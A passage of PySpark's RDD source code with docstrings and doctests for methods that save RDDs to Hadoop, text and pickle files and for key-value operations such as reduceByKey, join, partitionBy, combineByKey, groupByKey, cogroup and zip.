fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
keyConverter : str, optional
fully qualified classname of key converter (None by default)
valueConverter : str, optional
fully qualified classname of value converter (None by default)
conf : dict, optional
Hadoop job configuration (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(
pickledRDD._jrdd,
True,
path,
outputFormatClass,
keyClass,
valueClass,
keyConverter,
valueConverter,
jconf,
)
def saveAsHadoopDataset(
self: "RDD[Tuple[K, V]]",
conf: Dict[str, str],
keyConverter: Optional[str] = None,
valueConverter: Optional[str] = None,
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
"org.apache.spark.api.python.JavaToWritableConverter".
Parameters
----------
conf : dict
Hadoop job configuration
keyConverter : str, optional
fully qualified classname of key converter (None by default)
valueConverter : str, optional
fully qualified classname of value converter (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(
pickledRDD._jrdd, True, jconf, keyConverter, valueConverter, False
)
def saveAsHadoopFile(
self: "RDD[Tuple[K, V]]",
path: str,
outputFormatClass: str,
keyClass: Optional[str] = None,
valueClass: Optional[str] = None,
keyConverter: Optional[str] = None,
valueConverter: Optional[str] = None,
conf: Optional[Dict[str, str]] = None,
compressionCodecClass: Optional[str] = None,
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or "org.apache.spark.api.python.JavaToWritableConverter". The
`conf` is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
Parameters
----------
path : str
path to Hadoop file
outputFormatClass : str
fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
keyClass : str, optional
fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
valueClass : str, optional
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
keyConverter : str, optional
fully qualified classname of key converter (None by default)
valueConverter : str, optional
fully qualified classname of value converter (None by default)
conf : dict, optional
(None by default)
compressionCodecClass : str
fully qualified classname of the compression codec class
i.e. "org.apache.hadoop.io.compress.GzipCodec" (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsHadoopFile(
pickledRDD._jrdd,
True,
path,
outputFormatClass,
keyClass,
valueClass,
keyConverter,
valueConverter,
jconf,
compressionCodecClass,
)
def saveAsSequenceFile(
self: "RDD[Tuple[K, V]]", path: str, compressionCodecClass: Optional[str] = None
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the "org.apache.hadoop.io.Writable" types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pickle is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
Parameters
----------
path : str
path to sequence file
compressionCodecClass : str, optional
fully qualified classname of the compression codec class
i.e. "org.apache.hadoop.io.compress.GzipCodec" (None by default)
"""
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsSequenceFile(
pickledRDD._jrdd, True, path, compressionCodecClass
)
def saveAsPickleFile(self, path: str, batchSize: int = 10) -> None:
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is :class:`pyspark.serializers.CPickleSerializer`, default batch size
is 10.
Examples
--------
>>> from tempfile import NamedTemporaryFile
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
ser: Serializer
if batchSize == 0:
ser = AutoBatchedSerializer(CPickleSerializer())
else:
ser = BatchedSerializer(CPickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path: str, compressionCodecClass: Optional[str] = None) -> None:
"""
Save this RDD as a text file, using string representations of elements.
Parameters
----------
path : str
path to text file
compressionCodecClass : str, optional
fully qualified classname of the compression codec class
i.e. "org.apache.hadoop.io.compress.GzipCodec" (None by default)
Examples
--------
>>> from tempfile import NamedTemporaryFile
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> from tempfile import NamedTemporaryFile
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> from tempfile import NamedTemporaryFile
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> ''.join([r.decode('utf-8') if isinstance(r, bytes) else r for r in result])
'bar\\nfoo\\n'
"""
def func(split: int, iterator: Iterable[Any]) -> Iterable[bytes]:
for x in iterator:
if isinstance(x, bytes):
yield x
elif isinstance(x, str):
yield x.encode("utf-8")
else:
yield str(x).encode("utf-8")
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True # type: ignore[attr-defined]
assert self.ctx._jvm is not None
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self: "RDD[Tuple[K, V]]") -> Dict[K, V]:
"""
Return the key-value pairs in this RDD to the master as a dictionary.
Notes
-----
This method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
Examples
--------
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self: "RDD[Tuple[K, V]]") -> "RDD[K]":
"""
Return an RDD with the keys of each tuple.
Examples
--------
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self: "RDD[Tuple[K, V]]") -> "RDD[V]":
"""
Return an RDD with the values of each tuple.
Examples
--------
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(
self: "RDD[Tuple[K, V]]",
func: Callable[[V, V], V],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, V]]":
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with `numPartitions` partitions, or
the default parallelism level if `numPartitions` is not specified.
Default partitioner is hash-partition.
Examples
--------
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self: "RDD[Tuple[K, V]]", func: Callable[[V, V], V]) -> Dict[K, V]:
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Examples
--------
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator: Iterable[Tuple[K, V]]) -> Iterable[Dict[K, V]]:
m: Dict[K, V] = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1: Dict[K, V], m2: Dict[K, V]) -> Dict[K, V]:
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self: "RDD[Tuple[K, V]]") -> Dict[K, int]:
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
Examples
--------
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[V, U]]]":
"""
Return an RDD containing all pairs of elements with matching keys in
`self` and `other`.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in `self` and (k, v2) is in `other`.
Performs a hash join across the cluster.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[V, Optional[U]]]]":
"""
Perform a left outer join of `self` and `other`.
For each element (k, v) in `self`, the resulting RDD will either
contain all pairs (k, (v, w)) for w in `other`, or the pair
(k, (v, None)) if no elements in `other` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[Optional[V], U]]]":
"""
Perform a right outer join of `self` and `other`.
For each element (k, w) in `other`, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in `self` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[Optional[V], Optional[U]]]]":
"""
Perform a right outer join of `self` and `other`.
For each element (k, v) in `self`, the resulting RDD will either
contain all pairs (k, (v, w)) for w in `other`, or the pair
(k, (v, None)) if no elements in `other` have key k.
Similarly, for each element (k, w) in `other`, the resulting RDD will
either contain all pairs (k, (v, w)) for v in `self`, or the pair
(k, (None, w)) if no elements in `self` have key k.
Hash-partitions the resulting RDD into the given number of partitions.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(
self: "RDD[Tuple[K, V]]",
numPartitions: Optional[int],
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, V]]":
"""
Return a copy of the RDD partitioned using the specified partitioner.
Examples
--------
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = self._memory_limit() / 2
def add_shuffle_key(split: int, iterator: Iterable[Tuple[K, V]]) -> Iterable[bytes]:
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000) # type: ignore[operator]
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v)) # type: ignore[operator]
c += 1
# check used memory and avg size of chunk of objects
if c % 1000 == 0 and get_used_memory() > limit or c > batch:
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch = min(sys.maxsize, batch * 1.5) # type: ignore[assignment]
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True # type: ignore[attr-defined]
assert self.ctx._jvm is not None
with SCCallSiteSync(self.context):
pairRDD = self.ctx._jvm.PairwiseRDD(keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions, id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd: "RDD[Tuple[K, V]]" = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(
self: "RDD[Tuple[K, V]]",
createCombiner: Callable[[V], U],
mergeValue: Callable[[U, V], U],
mergeCombiners: Callable[[U, U], U],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, U]]":
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- `createCombiner`, which turns a V into a C (e.g., creates
a one-element list)
- `mergeValue`, to merge a V into a C (e.g., adds it to the end of
a list)
- `mergeCombiners`, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
Notes
-----
V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator: Iterable[Tuple[K, V]]) -> Iterable[Tuple[K, U]]:
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator: Iterable[Tuple[K, U]]) -> Iterable[Tuple[K, U]]:
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(
self: "RDD[Tuple[K, V]]",
zeroValue: U,
seqFunc: Callable[[U, V], U],
combFunc: Callable[[U, U], U],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, U]]":
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero() -> U:
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc
)
def foldByKey(
self: "RDD[Tuple[K, V]]",
zeroValue: V,
func: Callable[[V, V], V],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, V]]":
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
Examples
--------
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero() -> V:
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: func(createZero(), v), func, func, numPartitions, partitionFunc
)
def _memory_limit(self) -> int:
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(
self: "RDD[Tuple[K, V]]",
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, Iterable[V]]]":
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Notes
-----
If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
Examples
--------
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x: V) -> List[V]:
return [x]
def mergeValue(xs: List[V], x: V) -> List[V]:
xs.append(x)
return xs
def mergeCombiners(a: List[V], b: List[V]) -> List[V]:
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator: Iterable[Tuple[K, V]]) -> Iterable[Tuple[K, List[V]]]:
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it: Iterable[Tuple[K, List[V]]]) -> Iterable[Tuple[K, List[V]]]:
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(
self: "RDD[Tuple[K, V]]", f: Callable[[V], Iterable[U]]
) -> "RDD[Tuple[K, U]]":
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
Examples
--------
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
def flat_map_fn(kv: Tuple[K, V]) -> Iterable[Tuple[K, U]]:
return ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self: "RDD[Tuple[K, V]]", f: Callable[[V], U]) -> "RDD[Tuple[K, U]]":
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
Examples
--------
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
def map_values_fn(kv: Tuple[K, V]) -> Tuple[K, U]:
return kv[0], f(kv[1])
return self.map(map_values_fn, preservesPartitioning=True)
@overload
def groupWith(
self: "RDD[Tuple[K, V]]", other: "RDD[Tuple[K, V1]]"
) -> "RDD[Tuple[K, Tuple[ResultIterable[V], ResultIterable[V1]]]]":
...
@overload
def groupWith(
self: "RDD[Tuple[K, V]]", other: "RDD[Tuple[K, V1]]", __o1: "RDD[Tuple[K, V2]]"
) -> "RDD[Tuple[K, Tuple[ResultIterable[V], ResultIterable[V1], ResultIterable[V2]]]]":
...
@overload
def groupWith(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, V1]]",
_o1: "RDD[Tuple[K, V2]]",
_o2: "RDD[Tuple[K, V3]]",
) -> """RDD[
Tuple[
K,
Tuple[
ResultIterable[V],
ResultIterable[V1],
ResultIterable[V2],
ResultIterable[V3],
],
]
]""":
...
def groupWith( # type: ignore[misc]
self: "RDD[Tuple[Any, Any]]", other: "RDD[Tuple[Any, Any]]", *others: "RDD[Tuple[Any, Any]]"
) -> "RDD[Tuple[Any, Tuple[ResultIterable[Any], ...]]]":
"""
Alias for cogroup but with support for multiple RDDs.
Examples
--------
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, U]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, Tuple[ResultIterable[V], ResultIterable[U]]]]":
"""
For each key k in `self` or `other`, return a resulting RDD that
contains a tuple with the list of values for that key in `self` as
well as `other`.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(
self: "RDD[Tuple[K, V]]",
withReplacement: bool,
fractions: Dict[K, Union[float, int]],
seed: Optional[int] = None,
) -> "RDD[Tuple[K, V]]":
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
Examples
--------
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True
)
def subtractByKey(
self: "RDD[Tuple[K, V]]",
other: "RDD[Tuple[K, Any]]",
numPartitions: Optional[int] = None,
) -> "RDD[Tuple[K, V]]":
"""
Return each (key, value) pair in `self` that has no pair with matching
key in `other`.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair: Tuple[K, Tuple[V, Any]]) -> bool:
key, (val1, val2) = pair
return val1 and not val2 # type: ignore[return-value]
return (
self.cogroup(other, numPartitions)
.filter(filter_func) # type: ignore[arg-type]
.flatMapValues(lambda x: x[0])
)
def subtract(self: "RDD[T]", other: "RDD[T]", numPartitions: Optional[int] = None) -> "RDD[T]":
"""
Return each value in `self` that is not contained in `other`.
Examples
--------
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self: "RDD[T]", f: Callable[[T], K]) -> "RDD[Tuple[K, T]]":
"""
Creates tuples of the elements in this RDD by applying `f`.
Examples
--------
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self: "RDD[T]", numPartitions: int) -> "RDD[T]":
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
Examples
--------
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self: "RDD[T]", numPartitions: int, shuffle: bool = False) -> "RDD[T]":
"""
Return a new RDD that is reduced into `numPartitions` partitions.
Examples
--------
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(CPickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self: "RDD[T]", other: "RDD[U]") -> "RDD[Tuple[T, U]]":
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
Examples
--------
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser: Serializer) -> int:
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd: "RDD[V]", batchSize: int) -> "RDD[V]":
return rdd._reserialize(BatchedSerializer(CPickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer, other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self: "RDD[T]") -> "RDD[Tuple[T, int]]":
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
Examples
--------
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k: int, it: Iterable[T]) -> Iterable[Tuple[T, int]]:
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self: "RDD[T]") -> "RDD[Tuple[T, int]]":
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
:meth:`zipWithIndex`.
Examples
--------
